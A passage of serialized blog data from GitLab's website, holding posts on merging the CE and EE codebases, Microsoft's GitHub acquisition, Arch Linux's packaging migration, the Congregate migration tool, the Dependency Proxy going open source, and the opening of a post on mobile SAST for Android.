[gitlab] repository, with all open issues and merge requests moved into the single repository.\n* All frontend assets (JavaScript, CSS, images, views) will be open sourced under the MIT license.\n* All proprietary backend code is located in the `/ee` repository.\n* All documentation is merged together and clearly states which features belong to which [feature set]. Documentation is [already licensed under CC-BY-SA](https://gitlab.com/gitlab-org/gitlab-ce/issues/42891).\n\n### What remains unchanged?\n\n* The [gitlab-ce distribution] package remains fully open source under the same license.\n* All code outside of the `/ee` directory in the single [gitlab] repository is open source.\n* All code in the `/ee` directory remains proprietary with source code available.\n* Other projects, such as [gitlab-shell], [gitaly], [gitlab-workhorse], [gitlab-pages], remain unchanged.\n\n### What are the possible downsides?\n\nWe want to be clear about the possible downsides of this approach:\n\n* Users with installations from source currently cloning the [gitlab-ce] repository would download from a new repository named [gitlab]. The clone will also fetch the proprietary code in `/ee` directory, but removing this directory has no effect on running application.\n\n     ➡️ This is resolved by removing the `/ee` directory after cloning.\n* [gitlab-ce distribution] users would get more database tables because of the new tables in `db/schema.rb`. Database schema is open source and in the [gitlab-ce distribution] these new tables would not be populated, affect performance, or take significant space.\n\n     ➡️ All database migration code is open source and does not add additional maintenance burden, so no additional work is required.\n\n## What's next?\n\nWe currently think that the efficiency gains and clearer naming outweighs these disadvantages. Our [stewardship of GitLab](/company/stewardship/) is an important aspect of GitLab's success as a whole, so we would love to know:\n\n* Is there a better way to accomplish to solve the problem of the [busy work]?\n* What improvements can we make to our proposal?\n* Are there any additional considerations that we should take into account?\n\nWe invite you to share your suggestions in [issue 2952](https://gitlab.com/gitlab-org/gitlab-ee/issues/2952), which was an inspiration for the proposal as it currently stands. We look forward to hearing your thoughts!\n\nCover image from [Unsplash](https://images.unsplash.com/photo-1512217536414-d92543c79ca1)\n{: .note}\n\n[values]: https://handbook.gitlab.com/handbook/values/\n[gitlab-ce]: https://gitlab.com/gitlab-org/gitlab-ce\n[gitlab-ce distribution]: https://packages.gitlab.com/gitlab/gitlab-ce\n[gitlab-ee distribution]: https://packages.gitlab.com/gitlab/gitlab-ee\n[gitlab-ee]: https://gitlab.com/gitlab-org/gitlab-ee\n[gitlab]: https://gitlab.com/gitlab-org/gitlab\n[gitlab-shell]: https://gitlab.com/gitlab-org/gitlab-shell\n[gitaly]: https://gitlab.com/gitlab-org/gitaly\n[gitlab-workhorse]: https://gitlab.com/gitlab-org/gitlab-workhorse\n[gitlab-pages]: https://gitlab.com/gitlab-org/gitlab-pages\n[feature set]: /pricing/feature-comparison/\n[busy work]: https://en.wikipedia.org/wiki/Busy_work\n[working in CE and EE codebases blueprint]: https://gitlab.com/gitlab-com/gl-infra/readiness/-/tree/master/library/ce-ee-codebases\n[design for merging two codebases]: https://gitlab.com/gitlab-com/gl-infra/readiness/-/tree/master/library/merge-ce-ee-codebases\n",[803,267,277,9],{"slug":3834,"featured":6,"template":689},"merging-ce-and-ee-codebases","content:en-us:blog:merging-ce-and-ee-codebases.yml","Merging Ce And Ee Codebases","en-us/blog/merging-ce-and-ee-codebases.yml","en-us/blog/merging-ce-and-ee-codebases",{"_path":3840,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3841,"content":3847,"config":3852,"_id":3854,"_type":14,"title":3855,"_source":16,"_file":3856,"_stem":3857,"_extension":19},"/en-us/blog/microsoft-acquires-github",{"title":3842,"description":3843,"ogTitle":3842,"ogDescription":3843,"noIndex":6,"ogImage":3844,"ogUrl":3845,"ogSiteName":673,"ogType":674,"canonicalUrls":3845,"schema":3846},"Congratulations GitHub on the acquisition by Microsoft","The acquisition of GitHub by Microsoft is validation of the growing influence of software developers in the world.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680101/Blog/Hero%20Images/github-news-cover.png","https://about.gitlab.com/blog/microsoft-acquires-github","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Congratulations GitHub on the acquisition by Microsoft\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2018-06-03\",\n      }",{"title":3842,"description":3843,"authors":3848,"heroImage":3844,"date":3849,"body":3850,"category":10,"tags":3851},[970],"2018-06-03","\n\nCongratulations to GitHub on their [acquisition by Microsoft](https://www.bloomberg.com/news/articles/2018-06-03/microsoft-is-said-to-have-agreed-to-acquire-coding-site-github)! This is validation of the growing influence of software developers in the world, and the importance of [modern DevOps](/topics/devops/). The software community owes a lot to GitHub, and that includes the GitLab community. GitLab was first developed on GitHub and found its first contributors through it.\n\n## Code collaboration before GitHub\n\nOver the years, code collaboration has come a long way. Many developers will remember how code was often hosted on private websites, FTP servers, email, and IRC. We used to stuff a floppy disk or CD-ROM with code and mail it back and forth, or send patches to newsgroups or mailing lists in order to share and work on code together. It was a painful, error-prone time.\n\nGit, the [version control system](/topics/version-control/) used by GitHub, GitLab, and others, was first introduced in 2005. It allowed developers to work asynchronously, across the globe, on the same code. GitWeb went a step further, with its web interface for browsing a Git repository, including viewing contents of files, commit messages, and more.\n\nSourceForge offered the first glimpse of modern code collaboration by offering a central location to host and manage free, open source projects. Despite limited functionality and a cumbersome UI, SourceForge started bringing developers together in one place.\n\nEach step along the way improved the developer experience, allowed more people to contribute, and sped up the software development lifecycle.\n\n## A common place for code\n\nGitHub launched in 2008. While Git version control was a starting point for better code collaboration, GitHub made it even easier. By applying modern communication features inspired by social media sites, GitHub empowered social coding. It provided the first truly accessible UI to manage and review feature branches, and the ability to merge them with one-click “Pull Requests.” As a result, open source projects flocked to GitHub as a place to not only host code, but to grow a community as well.\n\n\u003Cdiv class=\"row\">\n\u003Cdiv class=\"col-md-6 col-sm-12\">\n\u003Cimg src=\"/images/blogimages/git-instaweb.png\" alt=\"GitWeb user interface\">\n\u003C/div>\n\u003Cdiv class=\"col-md-6 col-sm-12\">\n\u003Cimg src=\"/images/blogimages/github-ui.png\" alt=\"GitHub user interface\">\n\u003C/div>\n\u003Cdiv class=\"col-md-12 text-center\" style=\"margin-top: 5px\">\n\u003Cem>\u003Csmall>GitHub’s UI made it easier to manage and review feature branches compared to its predecessor, GitWeb.\u003C/small>\u003C/em>\n\u003C/div>\n\u003C/div>\n\n## What does the Microsoft acquisition mean for the industry?\n\nThe growing influence of software developers cannot be overstated. Developers are the [new kingmakers](https://thenewkingmakers.com/) and their influence within organizations is growing along with their value.\n\nGitHub has earned mindshare within the developer community, and Microsoft’s acquisition is certainly an attempt to garner and cultivate that mindshare. However, the long-term strategic implication seems to be that Microsoft wants to use GitHub as a means to drive Azure adoption.\n\nDeveloper tools have a high capacity for driving cloud usage. Once you have your application code hosted, the natural next step is to need a place to deploy it. Today, Microsoft fosters cloud adoption by tightly coupling Azure, its cloud service, together with Microsoft Visual Studio Team Services (VSTS), its set of development tools. Microsoft will likely integrate GitHub into VSTS in order to take advantage of the strong tie with Azure.\n\n> *“The way developers produce, deliver and maintain code has changed significantly in the last ten years and we applaud GitHub for being a driving force supporting the vast independent developer community through this evolution. This acquisition affirms the global importance of software developers and their influence in the enterprise. Microsoft likely acquired GitHub so it could more closely integrate it with Microsoft Visual Studio Team Services (VSTS) and ultimately help drive compute usage for Azure.” - [Sid Sijbrandij](/company/team/#sytses), GitLab CEO*\n\n## How does this relate to GitLab?\n\nWe applaud GitHub on its accomplishments and congratulate Microsoft on its acquisition. While we admire what's been done, our strategy differs in two key areas. First, instead of integrating multiple tools together, we believe a [single application](/handbook/product/single-application/), built from the ground up to support the entire DevOps lifecycle, is a better experience leading to a faster cycle time. Second, it’s important to us that the [core of our product always remain open source](/blog/gitlab-is-open-core-github-is-closed-source/) itself as well. Being “open core” means everyone can build the tools together. Having it all in a single application means everyone can use the same tool to collaborate together. We see the next evolution of software development as a world where everyone can contribute.\n",[9,930,751],{"slug":3853,"featured":6,"template":689},"microsoft-acquires-github","content:en-us:blog:microsoft-acquires-github.yml","Microsoft Acquires Github","en-us/blog/microsoft-acquires-github.yml","en-us/blog/microsoft-acquires-github",{"_path":3859,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3860,"content":3865,"config":3871,"_id":3873,"_type":14,"title":3874,"_source":16,"_file":3875,"_stem":3876,"_extension":19},"/en-us/blog/migrating-arch-linux-packaging-infrastructure-gitlab",{"title":3861,"description":3862,"ogTitle":3861,"ogDescription":3862,"noIndex":6,"ogImage":1733,"ogUrl":3863,"ogSiteName":673,"ogType":674,"canonicalUrls":3863,"schema":3864},"Migrating Arch Linux's packaging infrastructure to GitLab","Arch Linux developer Levente Polyak explains how the project recently migrated its packaging infrastructure to GitLab and what Arch Linux gained as a result.","https://about.gitlab.com/blog/migrating-arch-linux-packaging-infrastructure-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Migrating Arch Linux's packaging infrastructure to GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Levente Polyak\"}],\n        \"datePublished\": \"2023-09-11\",\n      }",{"title":3861,"description":3862,"authors":3866,"heroImage":1733,"date":3868,"body":3869,"category":10,"tags":3870},[3867],"Levente Polyak","2023-09-11","\nThree years ago, the Arch Linux community began a migration to the GitLab DevSecOps Platform to modernize our software development tooling and processes.\nWe recently announced a major moment on that journey: [migrating our entire packaging toolchain to Git and GitLab](https://archlinux.org/news/git-migration-completed/).\nThis move completely reshaped our packaging workflow, tooling, and storage — the very backbone of our package creation process.\n\nThe move has been pivotal for our continued success as a project.\nOur [package repositories](https://archlinux.org/packages/) contain nearly 14,000 packages at the time of this writing, and [GitLab's collaborative features](/pricing/feature-comparison/) empower our package maintainers to seamlessly collaborate, promoting efficient and effective teamwork.\nUsing GitLab as a central platform also enhances visibility across the project.\nWe can now effortlessly trace the history of changes, collaborate on enhancements and bugs, and follow the evolution of each package — all in a single place.\n\n> [Join GitLab at Open Source Summit Europe 2023](https://go.gitlab.com/dPQ92t) to learn more about our dedication to open source.\n\nI'm a devoted free open source software engineer and currently have the privilege of serving as the project leader of Arch Linux.\nIn this article, I'll explain how and why we undertook this complex, but ultimately worthwhile, endeavor.\n\n## Understanding Arch Linux's infrastructure\nTo understand the complexity of this migration, you'll first need to understand the history of Arch's infrastructure.\n\nCentral to our distribution are our [PKGBUILD](https://wiki.archlinux.org/title/PKGBUILD) packaging sources, which are the essential blueprints that shape each package installable with [pacman](https://archlinux.org/pacman/) from our official repositories. Previously, our [packaging infrastructure](https://wiki.archlinux.org/title/Creating_packages) relied on [Subversion](https://subversion.apache.org/) for managing our packaging sources.\n\nFor more than a decade of [Arch Linux's development](https://archlinux.org/releng/releases/), Subversion served as a reliable companion for working with our packaging source code. However, the open source software development landscape has transformed significantly since the advent of the Arch Linux project; technologies have advanced and collaboration dynamics have evolved (note, for example, the popularization of [DevOps](https://about.gitlab.com/topics/devops/) processes and practices).\n\nRecognizing the need to adapt and optimize, we started a journey that would shape the future of how members of the Arch Linux community work together. To enhance collaboration and pave the way for future improvements to Arch, we decided to undertake migration of our packaging sources to individual Git repositories, and we chose to host them with GitLab.\n\n## Migrating 14,000 Arch Linux packages\nThis would be no small task.\nCurrently, the Arch Linux community maintains 13,930 installable packages, all of which are now managed in 12,138 individual Git repositories.\nBut we knew the benefits would be worth the effort involved in such an enormous migration.\n\nFor example, one of the standout advantages of Git is its ability to empower packagers with a new level of insight into their work.\nThe ease of inspecting local history would become a game-changer, especially as packaging evolved into a collective effort, with multiple maintainers collaborating to refine and enhance individual packages (Subversion requires a client-server connection to inspect the history).\n\nBut the decision to migrate was not just about adopting Git.\nIt also reflected our aspiration to provide our community with an environment that fosters extensive collaboration. Our history with Subversion had shown its limitations in this regard (more on that in a moment).\nThe synergy between Git packaging repositories and the GitLab platform was evident; it opened doors to enhanced collaboration, offered powerful version control features, and laid the groundwork for more efficient packaging processes.\n\nThe migration of Arch Linux's packaging infrastructure to GitLab was the pinnacle of several factors aligning perfectly.\nThe need for a more robust collaboration platform, the growing prominence of Git, and the desire to utilize the benefits of modern version control converged to make this move a natural progression for Arch.\n\nWe decided it was time to get it done.\n\n## Three years and a weekend\nArch Linux has been gradually adopting and migrating operations to GitLab over the course of three years.\nExtending that migration to our packaging infrastructure was the next vital step of the process — and the pivotal moment of switching to GitLab hosting and workflow for packaging occurred within [the span of a single weekend](https://archlinux.org/news/git-migration-announcement/).\n\nA change of this magnitude touches the very core of our distribution, and it was only possible with thorough, meticulous preparation.\nFor weeks, our migration team diligently crafted [a runbook](https://md.archlinux.org/utjjQ-bQTsipIKntPrpf8g#) that ensured every major aspect and change were considered, minimizing risk and boosting our confidence.\n\nWhen our concentrated migration effort began, the migration team focused entirely on this rollout, everyone collaborating in a [Jitsi](https://meet.jit.si/) video call with screen sharing.\nThe strategic choice of a weekend for performing the migration aligned perfectly with our volunteer-driven community, offering sufficient time for a buffer and quick resolution to any unforeseen hiccups.\n\nThe first challenge was transferring our extensive Subversion history to GitLab. For some time, we had been running `git-svn` with a timer to be able to provide some packaging history to another repository.\nOur [custom tooling](https://gitlab.archlinux.org/archlinux/arch-svn-package-to-git/) made use of `git-svn` imports, which was a gigantic monorepo containing all packages as individual branches.\n\nOur migration solution was a carefully crafted script that used [git-filter-repo](https://github.com/newren/git-filter-repo), of which we could run several instances in parallel and which also supported the ability to convert only repositories that changed since the last run (determined by deltas).\nThe script also filtered history, commit messages, rewrote author data to incorporate our GitLab user handles, filtered unwanted files, and more.\nAdditionally, we tagged all previous releases where we could determine the origin of the exact commit.\n\nBut the migration wasn't confined to a mere transfer of Subversion history to GitLab; it involved revisiting workflows, tools, and all software that interacted *with* the version control system.\nFrom redefining workflows to embracing new tools, every step was vital to ensuring that Arch Linux developed in a coherent way.\n\nWe also wanted to seize the moment as an opportunity to reimagine and revamp package maintainer tooling.\nSo we also created [pkgctl](https://man.archlinux.org/man/pkgctl.1.en), a modern interface that not only refreshed and streamlined our tooling but also enhanced user and contributor experience.\n\nFortunately, the entire migration flowed seamlessly.\nBy the end of the weekend, we had succeeded.\n\n## Benefits of a journey with GitLab\nOur packaging migration was the latest milestone in Arch Linux's overall journey with GitLab.\nMigrating our packaging infrastructure to GitLab allows us to maximize and enjoy those improvements even more.\n\nSince the Arch Linux community began [migrating to GitLab in 2020](https://gitlab.com/gitlab-com/marketing/developer-relations/open-source-program/gitlab-open-source-partners/community-support/-/issues/11), Arch maintainers and contributors have enjoyed a significantly improved experience interacting with and contributing to the project.\nThe advantages not only enhance our current workflows but also open up exciting possibilities for the future.\n\nHere's a rundown of the benefits we've seen from our overall migration so far.\n\n### Deeper collaboration\nBefore the migration, for example, lack of a dedicated collaborative platform for our packaging sources posed challenges to both users and package maintainers. While [Flyspray](https://wiki.archlinux.org/title/Flyspray), our bug tracker, was valuable, its scope was limited to tracking issues rather than facilitating meaningful collaboration.\nProposed changes were often submitted as patch files in attachments, resulting in a cumbersome experience for users suggesting improvements and maintainers reviewing these changes.\n\nThe process of iterating through these patch files was tedious because we lacked the ability to comment on specific lines (not to mention the ability to discuss diverse sub-topics in individual threads).\n\nToday, GitLab's standard [merge request](https://docs.gitlab.com/ee/user/project/merge_requests/) feature has improved this process dramatically. It helps us collaborate smoothly, allowing [threaded discussions](https://docs.gitlab.com/ee/user/discussions/index.html), precise comments, and [code suggestions](https://docs.gitlab.com/ee/user/project/merge_requests/reviews/suggestions.html) on individual code segments. Although merge requests are a simple, staple feature, their impact on streamlining our processes is invaluable, serving as the bedrock of GitLab's collaborative strength.\n\nThe ability to seamlessly integrate issue tracking and merge requests within the same platform fosters a more cohesive and efficient workflow for our entire community. We're looking forward to tracking and managing packaging-related issues, bugs, and enhancements directly within GitLab soon.\n\n### Better automation\nOur use of [GitLab CI/CD](https://docs.gitlab.com/ee/ci/) has played a crucial role in automating our development work across our software projects.\n\nWe utilize CI/CD pipelines for everything from running tests to auditing dependencies—even publishing release artifacts, such as Rust crates, automatically using a tag pipeline. The efficiency we gain through this functionality is invaluable for ensuring the integrity and quality of our projects. We've realized some security improvements, too. Automating our usage of dependencies means we become aware of tracked security issues in our software projects used dependencies via commit pipelines, as well as scheduled pipelines (so we can bump and potentially deploy/release our software projects in case its necessary).\n\n### Stronger community\nAdopting GitLab has helped us better serve our community. The [Service Desk feature](https://docs.gitlab.com/ee/user/project/service_desk/) has emerged as a game-changer, offering a streamlined channel to manage specific user requests.\nThis integration with GitLab enhances the workflow without sacrificing overview.\n\nAnd recently, we've significantly increased our use of [GitLab Pages](https://docs.gitlab.com/ee/user/project/pages/).\nWe rely on Pages for publishing documentation, monthly reports, our Web Key Directory and static sites, and we're enthusiastic about expanding its application in the future.\n\n## More than new tools\nArch Linux's migration wasn't just about adopting the latest tools. Our motivation for migrating — and the positive consequences of the upgrade — reflect the values of open source communities like ours, where working together is essential for moving forward.\nBy adopting GitLab, Arch Linux is improving our project's overall atmosphere, creating a space where contributions are welcomed, reviewed, and integrated more easily, and in a way that conforms to contemporary best practices.\n\nWe're proud to be [GitLab Open Source Partners](https://go.gitlab.com/BM5JwV), and we extend our gratitude to GitLab for providing a platform that seamlessly aligns with our vision.\n\n[Join GitLab at Open Source Summit Europe 2023](https://go.gitlab.com/dPQ92t) to learn more about our dedication to open source.\n{: .note}\n",[9,267,1099],{"slug":3872,"featured":6,"template":689},"migrating-arch-linux-packaging-infrastructure-gitlab","content:en-us:blog:migrating-arch-linux-packaging-infrastructure-gitlab.yml","Migrating Arch Linux Packaging Infrastructure Gitlab","en-us/blog/migrating-arch-linux-packaging-infrastructure-gitlab.yml","en-us/blog/migrating-arch-linux-packaging-infrastructure-gitlab",{"_path":3878,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3879,"content":3884,"config":3890,"_id":3892,"_type":14,"title":3893,"_source":16,"_file":3894,"_stem":3895,"_extension":19},"/en-us/blog/migrating-repositories-to-gitlab-just-became-easier",{"title":3880,"description":3881,"ogTitle":3880,"ogDescription":3881,"noIndex":6,"ogImage":1407,"ogUrl":3882,"ogSiteName":673,"ogType":674,"canonicalUrls":3882,"schema":3883},"Migrating repositories to GitLab just became easier","Automate data and user migration into GitLab using open core software Congregate.","https://about.gitlab.com/blog/migrating-repositories-to-gitlab-just-became-easier","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Migrating repositories to GitLab just became easier\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Bryan May\"}],\n        \"datePublished\": \"2021-10-26\",\n      }",{"title":3880,"description":3881,"authors":3885,"heroImage":1407,"date":3887,"body":3888,"category":1119,"tags":3889},[3886],"Bryan May","2021-10-26","\n\nAs customers begin their journey with GitLab, they often start by moving their source code repositories to GitLab. The GitLab Professional Services team has been helping customers with large scale [migrations](/services/migration/) for years and during this time have built a utility to automate the migration process - [Congregate](https://gitlab.com/gitlab-org/professional-services-automation/tools/migration/congregate#congregate). To ensure we’re aligned with the [GitLab values](https://handbook.gitlab.com/handbook/values/) of transparency and collaboration, we’re making it available to customers and partners. As of today, Congregate has been moved to a [source available](https://en.wikipedia.org/wiki/Source-available_software) disposition. \n\nFor smaller customers this might not be too important because they can use [GitLab import functionality](https://docs.gitlab.com/ee/user/project/settings/import_export.html) to migrate themselves. But for customers moving hundreds or thousands of source code repositories and associated users to GitLab, this is a game changer. And perhaps most importantly, our growing team of [channel services partners](https://partners.gitlab.com/) can now leverage Congregate functionality as they help customers move data. And for each contribution that partners or customers make back to Congregate, the larger [community](/community/) benefits. \n\n## Why are you doing this? Customers pay you for these services!\n\nGitLab Professional Services falls under the umbrella of Customer Success and its [mission](https://about.gitlab.com/handbook/customer-success/#mission-statement) is to _deliver value to all customers by engaging in a consistent, repeatable, scalable way across defined segments so that customers see the value in their investment with GitLab_. While Professional Services needs to maintain a balanced business (we are not a cost center), we believe that our paramount goal is to help our customers. As GitLab grows and the number of customers also increases, we will rely more heavily on our channel partners. We see making Congregate source available as a means to reach the largest quantity of customers with the highest quality migration service offering. Similar to how GitLab has [over 3,000 contributions from the wider community](/blog/3000-contributors-post/), we think welcoming contributions for this migration tool will help ensure GitLab and its partners converge on a single solution rather than diverging to many. \n\n## What do you mean by _Source Available_?\n\nCongregate will be licensed under the GitLab EE license. For services partners and customers, this means:\n\n![Legal Guidelines](https://about.gitlab.com/images/blogimages/2021-10-20-migration-automation/legal-guidelines2.png)\n\n## I’m a partner, will GitLab PS support my migration?\n\n- No, but support is available on a fee-based engagement. As an example if you have a customer migration that you need support on, you can engage GitLab PS as the Prime and GitLab will work with you to subcontract the engagement to you and provide the  necessary support.  \n- If a Partner is using Congregate on its own contract directly with the customer, GitLab PS will not provide support for Congregate. As such, Congregate is a USE AT YOUR OWN RISK tool. \n- Customer engagements on a partner contract intending to migrate to gitlab.com can be subcontracted to GitLab PS to help with these migration activities. \n\n_Note: GitLab PS will always need to be involved for migrations to gitlab.com as certain elevated privileges are required to maintain data integrity._\n\n## It's just a bunch of scripted API calls, what's so special?\n\nCongregate is using all of the published APIs so there isn’t a ton of “secret sauce” in the project. However, we have spent time optimizing for performance using multiprocessing techniques to reduce the time it takes to gather and push data. We’ve also created a standard logging format to provide auditability of what happened during a migration. Congregate can migrate data from many popular source systems to help the majority of our prospects and customers move to GitLab.  \n\n## How can I use it?\n\nWe are releasing a learning path for partners (or customers) to earn a [certified GitLab migration engineer badge](https://gitlab.badgr.com/public/badges/zzzdONLxRaCW5cDQSlHsgw). This learning journey will initially be released to GitLab team members and partners. It will include general information about importing data into GitLab, quizzes and exams to validate your knowledge, and a hands-on workshop where you will use Congregate to move data to a test GitLab instance. Once you pass, you will receive a badge that you can post in a **#humblebrag** to your social media network - that's what social media is for, right? We recommend going through this training to understand how to use Congregate. As a partner, you can access this certification learning journey [here](https://partners.gitlab.com/prm/English/c/Training). \n\n![Certified Migration Services Engineer](https://about.gitlab.com/images/blogimages/2021-10-20-migration-automation/migration-badge.png){: .shadow.center}\n\n\n\n\n",[685,231,9],{"slug":3891,"featured":6,"template":689},"migrating-repositories-to-gitlab-just-became-easier","content:en-us:blog:migrating-repositories-to-gitlab-just-became-easier.yml","Migrating Repositories To Gitlab Just Became Easier","en-us/blog/migrating-repositories-to-gitlab-just-became-easier.yml","en-us/blog/migrating-repositories-to-gitlab-just-became-easier",{"_path":3897,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3898,"content":3903,"config":3909,"_id":3911,"_type":14,"title":3912,"_source":16,"_file":3913,"_stem":3914,"_extension":19},"/en-us/blog/minor-breaking-change-dependency-proxy",{"title":3899,"description":3900,"ogTitle":3899,"ogDescription":3900,"noIndex":6,"ogImage":2028,"ogUrl":3901,"ogSiteName":673,"ogType":674,"canonicalUrls":3901,"schema":3902},"The Dependency Proxy is moving to open source","We're moving the Dependency Proxy to Core to help address Docker Hub rate limiting issues.","https://about.gitlab.com/blog/minor-breaking-change-dependency-proxy","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"The Dependency Proxy is moving to open source\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Tim Rizzi\"}],\n        \"datePublished\": \"2020-10-30\",\n      }",{"title":3899,"description":3900,"authors":3904,"heroImage":2028,"date":3906,"body":3907,"category":930,"tags":3908},[3905],"Tim Rizzi","2020-10-30","\n\n[Docker Hub recently announced](https://www.docker.com/blog/dockers-next-chapter-our-first-year/) and will soon [enforce rate limits on pull requests from Docker Hub](https://docs.docker.com/docker-hub/download-rate-limit). Starting Nov. 2, 2020, pull rates will be limited based on your individual IP address for anonymous users or on your [pricing tier](https://www.docker.com/pricing) if you are authenticated and signed in. \n\nWhen I first read about the change, I thought, \"We have to tell people about the Dependency Proxy,\" which is meant for proxying and caching images from Docker Hub. Unfortunately, the Dependency Proxy has several limitations that will prevent you from relying on it to solve this rate-limiting issue. However, we arrived at a key question during the evaluation process: \"**Should proxying and caching images from Docker Hub be an open source feature?**\"\n\nThe short answer is yes. At GitLab, to determine what is open source and what is not, we ask ourselves: [Who cares the most about the feature?](/company/pricing/#buyer-based-open-core) Pulling images from Docker Hub is done every day by all types of developers. By supporting proxying and caching in Core, we can help developers everywhere by increasing the reliability and performance of their pipelines. The same is true for pulling packages from [npm](https://www.npmjs.com/), [Maven](https://mvnrepository.com/), [PyPI](https://pypi.org/), or any of the other most common public repositories. \n\nAs of GitLab 13.6 (Nov. 22nd, 2020), using the Dependency Proxy for proxying and caching images from Docker Hub or packages from any of the supported public repositories will be [free for all GitLab users](https://gitlab.com/gitlab-org/gitlab/-/issues/273655). Exciting, right? \n\nWe recognize that many users in our community have creative ideas on how to make GitLab an even better product. By partnering with the open source community, we can open source features even more quickly. And, we could use your help! There are a few key issues that will help everyone in the Community prepare for these upcoming Docker Hub rate limits and have faster, more reliable builds. \n\n### More details\n\n- [gitlab-#11582](https://gitlab.com/gitlab-org/gitlab/-/issues/11582) will add support for private groups when using the Dependency Proxy. This in-progress issue will also introduce a minor breaking change to the feature. One of the side effects of enabling the Dependency Proxy for private groups is that you will be required to sign in to Docker, even for public groups.  \n\nWhat this means is that before you can do something like:\n\n```\ndocker pull gitlab.example.com/groupname/dependency_proxy/containers/alpine:latest\n```\n\nYou must first log in by providing your username/password or personal access (*Sorry, no anonyomous pulls*)\n\n```\ndocker login gitlab.example.com\n```\n\n- [gitlab-241639](https://gitlab.com/gitlab-org/gitlab/-/issues/241639) is a very important feature that will allow you to pull images from the cache even when Docker Hub is unavailable, so long as the image and manifest have been previously added to the cache. The issue will accomplish this by caching the image's manifest as well as the associated blobs. \n- [gitlab-#208080](https://gitlab.com/gitlab-org/gitlab/-/issues/208080) will resolve a bug in which images are not pulled correctly from the cache when using certain storage configurations. \n- [gitlab-#246782](https://gitlab.com/gitlab-org/gitlab/-/issues/246782) will resolve a similar issue in which images are not pulled correctly from EC2 instances. \n\nAnd, if you are interested in helping the Dependency Proxy work with npm, consider contributing to these issues:\n- [gitlab-#241239](https://gitlab.com/gitlab-org/gitlab/-/issues/241239) will store the metadata associated with your npm package, so that the package can later be added to the cache.\n- [gitlab-#241243](https://gitlab.com/gitlab-org/gitlab/-/issues/241243) will add requested packages to the cache.\n- [gitlab-#241249](https://gitlab.com/gitlab-org/gitlab/-/issues/241249) will allow you to pull your npm packages from the cache.\n",[930,9],{"slug":3910,"featured":6,"template":689},"minor-breaking-change-dependency-proxy","content:en-us:blog:minor-breaking-change-dependency-proxy.yml","Minor Breaking Change Dependency Proxy","en-us/blog/minor-breaking-change-dependency-proxy.yml","en-us/blog/minor-breaking-change-dependency-proxy",{"_path":3916,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3917,"content":3923,"config":3929,"_id":3931,"_type":14,"title":3932,"_source":16,"_file":3933,"_stem":3934,"_extension":19},"/en-us/blog/mobile-static-application-security-testing-for-android",{"title":3918,"description":3919,"ogTitle":3918,"ogDescription":3919,"noIndex":6,"ogImage":3920,"ogUrl":3921,"ogSiteName":673,"ogType":674,"canonicalUrls":3921,"schema":3922},"Android App Security Testing with SAST","Learn how to secure your Android application with Static Application Security Testing.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749666816/Blog/Hero%20Images/security-cover.png","https://about.gitlab.com/blog/mobile-static-application-security-testing-for-android","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Android App Security Testing with SAST\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Fernando Diaz\"}],\n        \"datePublished\": \"2020-12-16\",\n      }",{"title":3918,"description":3919,"authors":3924,"heroImage":3920,"date":3926,"body":3927,"category":865,"tags":3928},[3925],"Fernando Diaz","2020-12-16","\n\nAt GitLab, everyone can contribute! [GitLab 13.5](/releases/2020/10/22/gitlab-13-5-released/) included an [integration for Mobile Static\nApplication Security Testing (SAST)](/releases/2020/10/22/gitlab-13-5-released/#sast-support-for-ios-and-android-mobile-apps) from one of our customers. For their contribution, the \n[H-E-B Digital](https://digital.heb.com/) team were [October 2020's MVP](/releases/2020/10/22/gitlab-13-5-released/#mvp).\n\nTheir contribution enables SAST for mobile applications. This includes iOS apps written in Objective-C\nand Swift as well as Android apps written in Java and Kotlin. \n\nThis blog post will go over how Mobile SAST works on Android.\n\n## Static Application Security Testing\n\n[Static Application Security Testing](https://docs.gitlab.com/ee/user/application_security/sast/) analyzes source code for known vulnerabilities.\nSAST is used to detect potentially dangerous attributes in a class, or unsafe code that can\nlead to unintended code execution, as well as other issues such as SQL Injection. More information\non SAST can be seen in the [OWASP Documentation](https://owasp.org/www-community/controls/Static_Code_Analysis).\n\nHere is a video which goes over [setting up SAST for Mobile](https://docs.gitlab.com/ee/user/application_security/sast/#experimental-features), as well as a sample application\nyou can use to get started:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube-nocookie.com/embed/v0GhEHZWtdw\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\nIn a nutshell, after the scanner has been configured, whenever an MR is created the\nscanner runs on the application source code and looks for patterns to determine if\nthat code is vulnerable. This is covered below.\n\nInitially this analyzer supports source code analysis but we intend to [expand support for binary\nscanning](https://gitlab.com/gitlab-org/gitlab/-/issues/269915) of .ipa and .apk files in the near future.\n\n## Understanding security rules\n\nSAST for mobile applications uses the Mobile Security Framework (MobSF) to scan source code. MobSF\nuses certain rules in order to determine if an application is vulnerable. The rules used to scan\nmobile applications can be seen in their [rules file](https://github.com/MobSF/Mobile-Security-Framework-MobSF/tree/master/StaticAnalyzer/views/android/rules).\nThese rules use [regex](https://en.wikipedia.org/wiki/Regular_expression) in order to find vulnerabilities in the static code.\n \nYou can also [contribute your own rules](https://github.com/MobSF/Mobile-Security-Framework-MobSF/blob/master/.github/CONTRIBUTING.md) if you have thoghts on enhancements.\nI made a small change to [enable a regex to work on 